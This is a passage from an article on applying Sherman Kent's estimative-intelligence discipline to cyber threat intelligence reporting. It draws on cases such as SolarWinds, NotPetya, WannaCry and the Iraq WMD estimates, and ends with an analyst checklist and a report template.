or inference.</li><li><strong>Alternative hypotheses:</strong> CTI must test whether shared infrastructure means same actor, whether victimology means deliberate targeting, and whether malware behavior proves intent.</li><li><strong>Collection gaps:</strong> CTI should turn uncertainty into hunt tasks, telemetry requirements, malware-analysis questions, and intelligence requirements.</li></ul><h4>But not everything transfers cleanly:</h4><ul><li><strong>CTI evidence is often technical and perishable:</strong> Domains, infrastructure, certificates, hashes, and telemetry can age quickly.</li><li><strong>Vendor labels are not legal attribution:</strong> NOBELIUM, APT29, COZY BEAR, and other labels may overlap, but they are not automatically interchangeable.</li><li><strong>Visibility is uneven:</strong> One vendor may see endpoint telemetry, another may see cloud logs, and a government source may have classified access unavailable to public readers.</li><li><strong>Intent is harder than behavior:</strong> Malware execution, credential theft, and lateral movement can be documented technically. Strategic objective usually requires assessment.</li><li><strong>A CTI report needs a scoped question:</strong> This article is a tradecraft guide. A real CTI report would need a PIR, key judgments, actor or campaign scope, timeline, source base, indicators, affected victims or sectors, confidence per judgment, and defensive implications.</li></ul><h3>1. Policy Relevance Without Policy Capture</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mBQ_-Mvq3kbMpUNRP3Dc0g.png"></figure><p>Kent argued for intelligence that mattered to national decisions. Relevance does not mean advocacy. In CTI terms, the analyst should understand the decision context — patch prioritization, detection engineering, executive risk, incident response, threat hunting, vendor exposure, or public communication — without forcing the evidence to support a preferred action.</p><h4>Example 1: Cuban Missile Crisis imagery supported decision-making without replacing policy judgment</h4><ul><li><strong>Claim:</strong> October 1962 imagery narrowed uncertainty about Soviet offensive missile deployment in Cuba, but did not determine the U.S. policy response.</li><li><strong>Evidence:</strong> U.S. historical records describe a U-2 flight on October 14, 1962 and subsequent photo interpretation that identified Soviet MRBM sites under construction.</li><li><strong>Source access:</strong> Official historical records and archival imagery; reported in U.S. government records, not author-observed here.</li><li><strong>Assessment:</strong> This is a strong national-security example of policy-relevant intelligence: evidence clarified the threat, while the response remained a policy decision.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: official records and archival imagery; Source reliability: established; Information credibility: corroborated; Author verification: public records checked, original imagery not independently analyzed here.</li><li><strong>Sources:</strong> <a href="https://history.state.gov/historicaldocuments/frus1961-63v11/d16">Office of the Historian, FRUS chronology</a>; <a href="https://www.archives.gov/milestone-documents/aerial-photograph-of-missiles-in-cuba">National Archives, Aerial Photograph of Missiles in Cuba</a>.</li><li><strong>Qualifier / limitation:</strong> This is not a CTI case. It is used because the evidence-to-decision structure is directly relevant to CTI reporting.</li></ul><p>The CTI translation is straightforward: a malware sample, intrusion timeline, or cloud log can narrow uncertainty, but it does not automatically decide whether the organization should disclose publicly, isolate a business unit, attribute the incident, or notify regulators.</p><h4>Example 2: The 2007 Iran NIE decomposed a broad question into narrower judgments</h4><ul><li><strong>Claim:</strong> The 2007 Iran NIE separated several analytic questions — weaponization, enrichment, intent, and future capability — instead of treating “Iran’s nuclear program” as one indivisible judgment.</li><li><strong>Evidence:</strong> The declassified NIE uses differentiated judgments and confidence levels across related nuclear questions.</li><li><strong>Source access:</strong> Public declassified key judgments; reported by ODNI, not author-observed classified sourcing.</li><li><strong>Assessment:</strong> The product is a useful example of decomposing a broad question into narrower estimative judgments.</li><li><strong>Confidence in assessment:</strong> High for the decomposition claim; low for any claim about policy effect unless separately sourced.</li><li><strong>Confidence basis:</strong> Source access: declassified ODNI key judgments; Source reliability: established; Information credibility: primary public document; Author verification: public text checked, classified sourcing not available.</li><li><strong>Sources:</strong> <a href="https://www.dni.gov/files/documents/Newsroom/Reports%20and%20Pubs/20071203_release.pdf">ODNI, Iran: Nuclear Intentions and Capabilities</a>; <a href="https://www.cia.gov/resources/csi/books-monographs/cia-support-to-policymakers-the-2007-nie-on-irans-nuclear-intentions-and-capabilities/">CIA CSI, 2007 NIE on Iran</a>.</li><li><strong>Qualifier / limitation:</strong> This article does not assess whether the NIE changed policy. It only uses the public product to show disciplined decomposition of judgments.</li></ul><h3>2. Facts, Assumptions, and Judgments</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*f0Wu_l81Mk6vjtKsA73UQA.png"></figure><p>Kent-style analysis requires a visible boundary between what the analyst knows and what the analyst concludes. The most dangerous failures often occur when assumptions are written as if they are evidence.</p><h4>Example 1: Iraq WMD analysis shows the risk of assumption-driven certainty</h4><ul><li><strong>Claim:</strong> The Iraq WMD case is a negative example of insufficiently disciplined separation between evidence, assumptions, and judgment.</li><li><strong>Evidence:</strong> The WMD Commission identified weak collection, analytic errors, and failure to make clear how much analysis rested on assumptions rather than strong evidence.</li><li><strong>Source access:</strong> Official retrospective commission reporting; reported, not author-observed original intelligence.</li><li><strong>Assessment:</strong> The Kent-style lesson is that historical behavior and concealment indicators should not be converted into current capability judgments without showing the inference chain.</li><li><strong>Confidence in assessment:</strong> High for the official finding of intelligence failure; moderate for the article’s specific “assumption-driven certainty” framing.</li><li><strong>Confidence basis:</strong> Source access: official retrospective commission reporting; Source reliability: established; Information credibility: corroborated for broad failure, interpreted for this article’s lesson framing; Author verification: public report checked, original intelligence not available.</li><li><strong>Sources:</strong> <a href="https://govinfo.library.unt.edu/wmd/report/index.html">WMD Commission report index</a>; <a href="https://govinfo.library.unt.edu/wmd/report/transmittal_letter.html">WMD Commission transmittal letter</a>; <a href="https://www.govinfo.gov/content/pkg/GPO-WMD/pdf/GPO-WMD.pdf">GPO WMD Commission PDF</a>.</li><li><strong>Qualifier / limitation:</strong> The Iraq case is not a CTI case. It is included because it is a canonical warning about assumptions, source weakness, and overconfident estimates.</li></ul><p><strong>Correct Kent-style wording would separate:</strong></p><ul><li><strong>Reported:</strong> Iraq had historical WMD programs and had previously concealed activity.</li><li><strong>Reported:</strong> sources and technical indicators were interpreted as suggesting renewed activity.</li><li><strong>Assumed:</strong> past concealment behavior implied possible continuing programs.</li><li><strong>Assessed:</strong> Iraq retained or reconstituted WMD capabilities.</li><li><strong>Collection gap:</strong> direct, reliable access to current program status was limited.</li></ul><p>The failure mode is converting “the regime has concealed WMD before” into “the regime currently has active WMD programs” without making the inferential jump visible enough.</p><h4>Example 2: SolarWinds analysis required separating technical fact from attribution judgment</h4><ul><li><strong>Claim:</strong> SolarWinds reporting should distinguish technical supply-chain compromise from actor attribution and strategic intent.</li><li><strong>Evidence:</strong> CISA reported malicious code inserted into the SolarWinds software lifecycle; CrowdStrike analyzed SUNSPOT’s role in manipulating the build process.</li><li><strong>Source access:</strong> CISA-reported government advisory and CrowdStrike-reported technical analysis; not author-observed here.</li><li><strong>Assessment:</strong> The technical compromise, vendor cluster labels, government attribution, and intent assessment should be written as separate claims.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: government advisory and vendor technical analysis; Source reliability: established; Information credibility: corroborated for supply-chain compromise; Author verification: public reports checked, no independent reverse engineering here.</li><li><strong>Sources:</strong> <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a">CISA AA20–352A</a>; <a href="https://www.crowdstrike.com/en-us/blog/sunspot-malware-technical-analysis/">CrowdStrike, SUNSPOT</a>.</li><li><strong>Qualifier / limitation:</strong> Public reporting can support strong technical conclusions while still leaving parts of attribution and intent dependent on non-public evidence.</li></ul><p><strong>Kent-style separation:</strong></p><ul><li><strong>Technical behavior:</strong> malicious Orion component inserted into build/update lifecycle.</li><li><strong>Tooling:</strong> SUNSPOT and SUNBURST.</li><li><strong>Vendor/government label:</strong> NOBELIUM, StellarParticle, APT29-style community labels depending on source.</li><li><strong>Attribution:</strong> assessed responsibility by governments or vendors.</li><li><strong>Intent:</strong> assessed intelligence collection or access objective.</li></ul><h3>3. Estimative Probability Language</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dOK04WErXA1j0WBJz5d0Xw.png"></figure><p>Kent’s “Words of Estimative Probability” addressed a persistent intelligence problem: analysts use words like “possible,” “probable,” and “likely,” but readers may assign different probabilities to the same words. This discipline does not require every estimate to become a math problem. It requires that probability language be intentional and consistent.</p><h4>Example 1: APT28 attribution should preserve source confidence</h4><ul><li><strong>Claim:</strong> Public APT28 attribution language should preserve the source’s estimative wording.</li><li><strong>Evidence:</strong> The linked Google Cloud/Mandiant blog says FireEye assessed APT28 was most likely sponsored by the Russian government and targeted information useful to government interests. Older or fuller Mandiant/FireEye reporting may use different confidence phrasing, so analysts should preserve the exact wording of the specific source they cite.</li><li><strong>Source access:</strong> Vendor reporting based on proprietary analysis; exact source base not fully available to public readers.</li><li><strong>Assessment:</strong> “The cited Google Cloud/Mandiant blog says FireEye assessed APT28 was most likely sponsored by the Russian government” is stronger tradecraft than writing “APT28 is proven to be Russia.”</li><li><strong>Confidence in assessment:</strong> High for the wording recommendation; moderate for public evaluation of the underlying sponsorship claim.</li><li><strong>Confidence basis:</strong> Source access: vendor reporting based on proprietary analysis; Source reliability: established vendor; Information credibility: credible but not fully public; Author verification: linked blog wording checked, underlying evidence not independently verified.</li><li><strong>Source:</strong> <a href="https://cloud.google.com/blog/topics/threat-intelligence/apt28-a-window-into-russias-cyber-espionage-operations">Google Cloud / Mandiant, APT28</a>.</li><li><strong>Qualifier / limitation:</strong> Vendor attribution can be credible without being fully independently auditable from public evidence.</li></ul><p><strong>Kent-style wording:</strong></p><ul><li><strong>Better</strong>: “The cited Google Cloud/Mandiant blog says FireEye assessed APT28 was most likely sponsored by the Russian government.”</li><li><strong>Weaker</strong>: “APT28 is Russian government-directed.”</li><li><strong>Worse</strong>: “APT28 is proven to be Russia.”</li></ul><p>The first version preserves the source, the estimative term, and the fact that the statement is an assessment.</p><h4>Example 2: 2007 Iran NIE showed probability and confidence in the same product</h4><ul><li><strong>Claim:</strong> The 2007 Iran NIE is a useful example of stating confidence levels across separate judgments.</li><li><strong>Evidence:</strong> The declassified NIE differentiates judgments about halted weaponization, enrichment, intent, and future decisions.</li><li><strong>Source access:</strong> Public declassified key judgments; original classified evidence not available here.</li><li><strong>Assessment:</strong> The product demonstrates why broad topics should be decomposed into narrower estimates with separate uncertainty.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: declassified ODNI key judgments; Source reliability: established; Information credibility: primary public document; Author verification: public text checked, classified sourcing not available.</li><li><strong>Source:</strong> <a href="https://www.dni.gov/files/documents/Newsroom/Reports%20and%20Pubs/20071203_release.pdf">ODNI, Iran NIE</a>.</li><li><strong>Qualifier / limitation:</strong> Confidence language is not a guarantee of truth. It is a statement about evidentiary strength and analytic basis at the time of the estimate.</li></ul><h3>4. Confidence Is Not Probability</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*PieOUrrsp4VbSGcRInnZpg.png"></figure><p>Probability answers: “How likely is the judgment?” Confidence answers: “How strong is the basis for the judgment?” Analysts often blur these together. Kent-style discipline keeps them separate.</p><h4>Example 1: Iraq WMD showed that high-confidence judgments can still be wrong</h4><ul><li><strong>Claim:</strong> High confidence does not guarantee analytic accuracy if the source base and assumptions are weak.</li><li><strong>Evidence:</strong> Official retrospective reporting found major problems in prewar Iraq WMD assessments, including unsupported or overstated judgments.</li><li><strong>Source access:</strong> Official retrospective investigations and public reporting.</li><li><strong>Assessment:</strong> The case shows why confidence statements must identify source quality, access, corroboration, and assumption sensitivity.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: official retrospective investigations; Source reliability: established; Information credibility: corroborated for failure finding; Author verification: public reports checked, original intelligence not available.</li><li><strong>Sources:</strong> <a href="https://www.govinfo.gov/content/pkg/GPO-WMD/pdf/GPO-WMD.pdf">WMD Commission report</a>; <a href="https://www.globalsecurity.org/intell/library/congress/2004_rpt/iraq-wmd_intell_09jul2004_conclusions.htm">Senate Select Committee conclusions via GlobalSecurity mirror</a>.</li><li><strong>Qualifier / limitation:</strong> This does not mean confidence language is useless. It means confidence must be earned and explained.</li></ul><p><strong>Kent-style analysts should ask:</strong></p><ul><li>What are the strongest sources?</li><li>Which sources are single points of failure?</li><li>What assumptions connect the evidence to the judgment?</li><li>What reporting contradicts the judgment?</li><li>What evidence would reduce confidence?</li></ul><h4>Example 2: CTI malware behavior can be high confidence while intent remains moderate confidence</h4><ul><li><strong>Claim:</strong> A CTI product can have high confidence in technical behavior and lower confidence in actor intent.</li><li><strong>Evidence:</strong> Mandiant reporting ties WannaCry to SMBv1/TCP 445 propagation and EternalBlue/MS17–010 exploitation. The U.S. Department of Justice later alleged that a North Korean regime-backed programmer connected to Lazarus Group activity participated in creating the malware used in the WannaCry 2.0 attack.</li><li><strong>Source access:</strong> Mandiant malware analysis reported technical behavior; DOJ charged/alleged DPRK-linked involvement and provided public attribution material; not author-observed here.</li><li><strong>Assessment:</strong> Analysts should assign separate confidence to malware behavior, actor clustering, government attribution, and intent. Government attribution does not remove the need to distinguish technical behavior from strategic motivation.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: Mandiant malware analysis and DOJ charging/public attribution material; Source reliability: established; Information credibility: high for SMB/MS17–010 behavior, established public government attribution exists, inferred for intent and internal tasking; Author verification: public reporting checked, no independent malware analysis here.</li><li><strong>Sources:</strong> <a href="https://cloud.google.com/blog/topics/threat-intelligence/wannacry-malware-profile">Mandiant, WannaCry malware profile</a>; <a href="https://cloud.google.com/blog/topics/threat-intelligence/smb-exploited-wannacry-use-of-eternalblue/">Mandiant, WannaCry use of EternalBlue</a>; <a href="https://www.justice.gov/archives/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and">DOJ, North Korean regime-backed programmer charged</a>.</li><li><strong>Qualifier / limitation:</strong> This article does not independently adjudicate the DPRK/Lazarus attribution. It uses the case to show how post-attribution CTI should still separate behavior, attribution, and intent.</li></ul><h3>5. Alternative Hypotheses</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OgBOQ_0sgEge7IwPdLOr7g.png"></figure><p>Kent-style analysis does not require analysts to treat all hypotheses as equally plausible. It does require analysts to ask what else could explain the evidence and what collection would discriminate between explanations.</p><h4>Example 1: 9/11 warning failure showed the cost of narrow imagination</h4><ul><li><strong>Claim:</strong> The 9/11 case illustrates why warning analysis needs alternative hypotheses before a threat becomes obvious in hindsight.</li><li><strong>Evidence:</strong> The 9/11 Commission identified failures of imagination, policy, capabilities, and management.</li><li><strong>Source access:</strong> Official retrospective commission reporting.</li><li><strong>Assessment:</strong> A warning product should test competing explanations for fragmentary indicators, including low-frequency but high-impact possibilities.</li><li><strong>Confidence in assessment:</strong> High for the broad warning lesson; moderate for any reconstructed pre-attack hypothesis set.</li><li><strong>Confidence basis:</strong> Source access: official retrospective commission reporting; Source reliability: established; Information credibility: corroborated for broad failure categories, illustrative for reconstructed hypotheses; Author verification: public report checked.</li><li><strong>Sources:</strong> <a href="https://www.9-11commission.gov/report/911Report.pdf">9/11 Commission Report PDF</a>; <a href="https://www.ojp.gov/ncjrs/virtual-library/abstracts/911-commission-report-executive-summary">Office of Justice Programs summary</a>.</li><li><strong>Qualifier / limitation:</strong> Hindsight makes patterns look cleaner than they appeared at the time. The goal is humility and better warning structure, not retrospective certainty.</li></ul><p><strong>Possible analytic frame before the attack:</strong></p><ul><li><strong>H1:</strong> Al-Qaida intended overseas attacks against U.S. interests.</li><li><strong>H2:</strong> Al-Qaida intended a major attack inside the United States.</li><li><strong>H3:</strong> Al-Qaida intended aviation-related operations, but the exact target and method were unknown.</li><li><strong>Discrimination:</strong> travel patterns, flight training, visa anomalies, financial movement, communications, and detainee reporting could have been evaluated as indicators across hypotheses.</li></ul><h4>Example 2: NotPetya intent remains an assessed judgment</h4><ul><li><strong>Claim:</strong> NotPetya’s destructive effect is easier to establish publicly than the operators’ internal intent.</li><li><strong>Evidence:</strong> Microsoft reported destructive behavior and enterprise spread; Cisco Talos reported M.E.Doc infrastructure manipulation connected to the outbreak. The UK and U.S. governments publicly attributed NotPetya to the Russian government or Russian military in February 2018, and DOJ later charged GRU Unit 74455 officers in connection with NotPetya and other destructive operations.</li><li><strong>Source access:</strong> Vendor technical analysis, incident reporting, and public government attribution statements.</li><li><strong>Assessment:</strong> Destructive effect should be reported separately from strategic intent even after public government attribution exists.</li><li><strong>Confidence in assessment:</strong> High for destructive effect; moderate for specific intent claims.</li><li><strong>Confidence basis:</strong> Source access: vendor technical reporting and government attribution statements; Source reliability: established; Information credibility: corroborated for destructive effect, public attribution strengthens actor context, internal intent remains inferred; Author verification: public reports checked, no original telemetry review.</li><li><strong>Sources:</strong> <a href="https://www.microsoft.com/security/blog/2017/10/03/advanced-threat-analytics-security-research-network-technical-analysis-notpetya/">Microsoft, NotPetya technical analysis</a>; <a href="https://blogs.cisco.com/security/talos/the-medoc-connection">Cisco Talos, The MeDoc Connection</a>; <a href="https://www.gov.uk/government/news/foreign-office-minister-condemns-russia-for-notpetya-attacks">UK Government, Foreign Office Minister condemns Russia for NotPetya</a>; <a href="https://trumpwhitehouse.archives.gov/briefings-statements/statement-press-secretary-25/">White House, Statement from the Press Secretary</a>; <a href="https://www.justice.gov/opa/pr/six-russian-gru-officers-charged-connection-worldwide-deployment-destructive-malware-and">DOJ, Six Russian GRU officers charged</a>.</li><li><strong>Qualifier / limitation:</strong> Public attribution strengthens the actor context, but it still does not expose every internal objective, command decision, or intended propagation boundary.</li></ul><p><strong>Alternative hypotheses:</strong></p><ul><li><strong>H1:</strong> NotPetya was designed as a destructive state operation using ransomware aesthetics as cover.</li><li><strong>H2:</strong> NotPetya was designed primarily for Ukraine-focused disruption but propagated more broadly than intended.</li><li><strong>H3:</strong> The ransomware presentation reflected mixed objectives or operational cover rather than a pure financial motive.</li></ul><p>The evidence strongly supports destructive effect. It does not publicly prove the internal decision process behind the operation.</p><h3>6. Warning, Indicators, and Collection Gaps</h3><p>Kent-style analysis is not only retrospective. It should produce warning questions and collection requirements. A judgment with no collection gap is often a judgment that has not been examined carefully enough.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XkXGaxgF5xHc8p4jfSAsBg.png"></figure><h4>Example 1: Cuban Missile Crisis warning depended on collection timing and imagery interpretation</h4><ul><li><strong>Claim:</strong> The Cuban Missile Crisis shows how warning changes as collection improves.</li><li><strong>Evidence:</strong> Official records describe the October 14, 1962 U-2 mission, subsequent photo interpretation, and identification of MRBM sites under construction.</li><li><strong>Source access:</strong> Official records and imagery references.</li><li><strong>Assessment:</strong> Before imagery confirmation, the problem was warning under uncertainty; after imagery, the problem became site status, operational timeline, Soviet intent, and escalation risk.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: official records and imagery references; Source reliability: established; Information credibility: corroborated; Author verification: public records checked.</li><li><strong>Sources:</strong> <a href="https://history.state.gov/historicaldocuments/frus1961-63v11/d16">Office of the Historian, FRUS chronology</a>; <a href="https://www.dia.mil/News-Features/Photo-Gallery/igphoto/2000948884/">DIA photo record</a>.</li><li><strong>Qualifier / limitation:</strong> This is a national-security warning example, not a CTI intrusion case.</li></ul><p><strong>Kent-style warning questions:</strong></p><ul><li>What indicators would show offensive missile deployment rather than defensive military aid?</li><li>What collection confirms construction status?</li><li>What evidence distinguishes operational missiles from support equipment?</li><li>What is the time horizon before the threat becomes operational?</li><li>What assumptions could cause overreaction or underreaction?</li></ul><h4>Example 2: SolarWinds exposed a collection gap in trusted software supply chains</h4><ul><li><strong>Claim:</strong> SolarWinds showed that trusted software updates can create visibility gaps not solved by ordinary IOC matching.</li><li><strong>Evidence:</strong> CISA and CrowdStrike reporting describe malicious code inserted into a trusted software build and update process.</li><li><strong>Source access:</strong> Government advisory and vendor technical analysis.</li><li><strong>Assessment:</strong> The collection gap included build integrity, signed software provenance, vendor trust relationships, and anomalous post-update behavior.</li><li><strong>Confidence in assessment:</strong> High for the SolarWinds-specific gap; moderate for generalizing across all software supply-chain risk.</li><li><strong>Confidence basis:</strong> Source access: government advisory and vendor technical analysis; Source reliability: established; Information credibility: corroborated for SolarWinds compromise mechanism, inferred for broader supply-chain lessons; Author verification: public reports checked.</li><li><strong>Sources:</strong> <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a">CISA AA20–352A</a>; <a href="https://www.crowdstrike.com/en-us/blog/sunspot-malware-technical-analysis/">CrowdStrike, SUNSPOT</a>.</li><li><strong>Qualifier / limitation:</strong> A supply-chain compromise does not imply every similar vendor relationship is equally exposed.</li></ul><h3>7. Analytic Integrity in CTI</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*SjsMMnm-vjqrTKTrKl-QUA.png"></figure><p>CTI reporting often mixes telemetry, malware family names, vendor clusters, infrastructure, attribution, and intent. Analytic integrity means refusing to compress those into a single confident story unless the evidence supports it.</p><h4>Example 1: APT1 victimology supports targeting assessment, not observed reconnaissance</h4><ul><li><strong>Claim:</strong> APT1 victimology supports a target-selection assessment, but does not directly prove specific reconnaissance methods.</li><li><strong>Evidence:</strong> Mandiant reported that APT1 compromised at least 141 organizations across many industries and tied the victimology to Chinese strategic priorities.</li><li><strong>Source access:</strong> Vendor incident response and technical reporting; public readers do not see the full underlying evidence.</li><li><strong>Assessment:</strong> Victimology supports deliberate campaign-level targeting, while individual intrusion reconnaissance remains a collection gap unless separate evidence exists.</li><li><strong>Confidence in assessment:</strong> Moderate.</li><li><strong>Confidence basis:</strong> Source access: vendor incident response reporting; Source reliability: established vendor; Information credibility: credible but limited public raw data; Author verification: public report checked, underlying case data not available.</li><li><strong>Source:</strong> <a href="https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf">Mandiant, APT1 report</a>.</li><li><strong>Qualifier / limitation:</strong> Victimology alignment is not proof of tasking or pre-compromise research for each victim.</li></ul><p><strong>Kent-style wording:</strong></p><ul><li><strong>Reported:</strong> APT1 compromised a large victim set across multiple sectors.</li><li><strong>Assessed by source:</strong> Victim sectors aligned with strategic economic and policy interests.</li><li><strong>Inferred by this article:</strong> The campaign likely involved deliberate target selection.</li><li><strong>Collection gap:</strong> The exact reconnaissance method before each intrusion is not directly shown by victimology alone.</li></ul><h4>Example 2: SUNBURST, GoldMax, Sibot, and StellarParticle should not be flattened into one label</h4><ul><li><strong>Claim:</strong> SolarWinds-related reporting requires careful separation of malware, tools, vendor clusters, campaign names, attribution, and intent.</li><li><strong>Evidence:</strong> Microsoft described GoldMax, GoldFinder, and Sibot as later-stage NOBELIUM tools; CrowdStrike used StellarParticle for related follow-on intrusion activity.</li><li><strong>Source access:</strong> Vendor technical analysis based on proprietary telemetry and incident response.</li><li><strong>Assessment:</strong> Treating SUNBURST, SUNSPOT, GoldMax, Sibot, NOBELIUM, StellarParticle, APT29, and COZY BEAR as interchangeable would collapse different analytic layers.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: vendor technical reporting; Source reliability: established vendors; Information credibility: credible and label-specific; Author verification: public reports checked, cross-vendor clustering not independently verified.</li><li><strong>Sources:</strong> <a href="https://www.microsoft.com/en-us/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/">Microsoft, GoldMax, GoldFinder, and Sibot</a>; <a href="https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/">CrowdStrike, StellarParticle observations</a>.</li><li><strong>Qualifier / limitation:</strong> Cross-vendor clustering may be valid, but it should be stated as an assessment with evidence, not assumed from name proximity.</li></ul><p><strong>Kent-style separation:</strong></p><ul><li><strong>Malware/tool:</strong> SUNBURST, SUNSPOT, GoldMax, GoldFinder, Sibot.</li><li><strong>Vendor cluster:</strong> NOBELIUM, StellarParticle, APT29-style community labels.</li><li><strong>Campaign:</strong> SolarWinds-related intrusion activity.</li><li><strong>Attribution:</strong> assessed state-linked responsibility.</li><li><strong>Intent:</strong> intelligence collection, access development, or other objectives.</li></ul><h3>Cognitive Biases CTI Analysts Should Name</h3><p>Kent-style discipline is partly about fighting predictable analytic failure modes. The CIA tradecraft primer emphasizes structured techniques because analysts working with incomplete and ambiguous information are vulnerable to cognitive bias (<a href="https://www.cia.gov/resources/csi/static/Tradecraft-Primer-apr09.pdf">CIA, A Tradecraft Primer</a>).</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_MKrRprTzQEF_CJcS2EefA.png"></figure><p><strong>Common CTI bias patterns:</strong></p><ul><li><strong>Confirmation bias:</strong> treating every new domain, malware string, or infrastructure overlap as support for the actor hypothesis already in the analyst’s head.</li><li><strong>Anchoring:</strong> giving too much weight to the first vendor label or first incident-response theory, even after better evidence appears.</li><li><strong>Mirror imaging:</strong> assuming the adversary values risk, cost, publicity, or operational tempo the same way the defender does.</li><li><strong>Availability bias:</strong> over-weighting the most recent high-profile campaign because it is memorable, not because it best explains the evidence.</li><li><strong>Groupthink:</strong> converging on a shared attribution label because peer teams or trusted vendors use it, without separately testing the underlying evidence.</li></ul><p>Structured analytic techniques are useful because they force friction into the analysis. Alternative hypotheses, key assumptions checks, evidence matrices, and premortems are not bureaucratic decoration; they are bias controls. In CTI, the most practical bias check is simple: before publishing an attribution, write down the strongest evidence against it.</p><h3>Where ATT&amp;CK and the Pyramid of Pain Fit</h3><p>MITRE ATT&amp;CK gives CTI teams a structured vocabulary for adversary tactics and techniques based on real-world observations (<a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a>). The Pyramid of Pain, associated with David Bianco, explains why higher-level behavioral indicators and TTPs are usually harder for adversaries to change than hashes, IPs, and domains.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Avn2HMvyvckpmQTWnsCEiQ.png"></figure><p><strong>Kent-style discipline does not replace these frameworks. It tells analysts how to write about them:</strong></p><ul><li><strong>Hash, IP, domain:</strong> usually source-observed or reported technical indicators; useful but often perishable and weak for attribution.</li><li><strong>Host or network artifact:</strong> stronger than a raw IOC when tied to execution context, but still may not identify an actor.</li><li><strong>ATT&amp;CK technique:</strong> a behavioral claim. It should be mapped only when evidence supports the behavior, not because a malware family is commonly associated with the technique.</li><li><strong>Tool:</strong> stronger than a hash when supported by reverse engineering, but tool reuse and leaks can complicate attribution.</li><li><strong>TTP pattern:</strong> stronger for clustering when repeated across time, victims, infrastructure, and tooling.</li><li><strong>Actor attribution and intent:</strong> assessed judgments. ATT&amp;CK mapping can support them, but does not prove them by itself.</li></ul><p>Example: “The intrusion used credential dumping” is a technique-level claim. “This was APT28” is an attribution claim. “The objective was strategic intelligence collection” is an intent claim. They need different evidence and different confidence statements.</p><h3>Kent-Style Checklist</h3><p>Use this checklist before publishing an analytic judgment:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kZv6tiN5XkW8yiGJzvSiSA.png"></figure><ol><li><strong>Question:</strong> What decision or intelligence requirement does this answer?</li><li><strong>Claim:</strong> What exactly are you asserting?</li><li><strong>Evidence:</strong> What is source-observed, reported, assessed, or inferred?</li><li><strong>Source access:</strong> Did the source have telemetry, malware samples, logs, imagery, victim access, official records, or secondhand reporting?</li><li><strong>Source reliability:</strong> Is the source established, unknown, contested, or mixed?</li><li><strong>Information credibility:</strong> Is the information corroborated, single-source, inferred, or disputed?</li><li><strong>Author verification:</strong> What did you personally verify?</li><li><strong>Assumptions:</strong> What must be true for the judgment to hold?</li><li><strong>Probability:</strong> How likely is the judgment?</li><li><strong>Confidence:</strong> How strong is the evidence base?</li><li><strong>Alternatives:</strong> What else could explain the same evidence?</li><li><strong>Discrimination:</strong> What evidence would separate the hypotheses?</li><li><strong>Gaps:</strong> What do we still not know?</li><li><strong>Dissent:</strong> Are there credible disagreements or minority views?</li><li><strong>Change indicators:</strong> What would cause the assessment to change?</li></ol><h3>Practical Analyst Template</h3><pre>Product title:<br>Primary intelligence requirement:<br>Decision context:<br>Analyst:<br>Date:<br>Bottom line:<br>- Assessment:<br>- Probability language:<br>- Confidence:<br>- Scope and time horizon:<br>Claim:<br>- Exact claim:<br>- What this claim does not say:<br>Evidence base:<br>- Author-observed:<br>- Source-observed:<br>- Reported:<br>- Assessed by source:<br>- Inferred by analyst:<br>Source quality:<br>- Source access:<br>- Source reliability:<br>- Information credibility:<br>- Corroboration:<br>- Author verification:<br>Assumptions:<br>- Assumption 1:<br>- Assumption 2:<br>- Assumption sensitivity:<br>Alternative hypotheses:<br>- H1 (primary):<br>- H2 (alternative):<br>- H3 (alternative, if needed):<br>- Discriminating evidence:<br>- Current preferred hypothesis and why:<br>Confidence basis:<br>- Collection strength:<br>- Collection weakness:<br>- Analytic uncertainty:<br>- Dissent or caveats:<br>Collection requirements:<br>- Requirement 1:<br>- Requirement 2:<br>- Requirement 3:<br>Indicators to watch:<br>- Indicator that would increase confidence:<br>- Indicator that would decrease confidence:<br>- Indicator that would change the assessment:<br>Defensive or policy implications:<br>- Tactical:<br>- Operational:<br>- Strategic:</pre><h3>Conclusion</h3><p>Sherman Kent’s analytic legacy is not a historical curiosity. It is a practical discipline for writing intelligence under uncertainty. For CTI analysts, the lesson is especially important because cyber reporting routinely combines artifacts, telemetry, malware names, infrastructure links, vendor clusters, government statements, victimology, attribution, and intent.</p><p>The real-world examples show why the discipline matters:</p><ul><li>Cuban Missile Crisis imagery shows policy-relevant intelligence narrowing uncertainty without replacing policy judgment.</li><li>Iraq WMD analysis shows the danger of converting assumptions into confident conclusions.</li><li>The 2007 Iran NIE shows the value of decomposing a broad issue into separate judgments with separate confidence levels.</li><li>9/11 warning analysis shows why alternative hypotheses matter before a threat is obvious.</li><li>SolarWinds shows why CTI must separate technical fact, tooling, vendor labels, attribution, and intent.</li><li>APT1 victimology shows how to infer target selection without pretending to observe reconnaissance.</li><li>NotPetya shows why destructive effect and strategic intent must be assessed separately.</li></ul><p>Used this way, Kent-style analytic discipline helps CTI analysts produce clearer estimates, better collection requirements, more defensible confidence statements, and fewer overclaims.</p><h3>References</h3><ul><li>CIA, 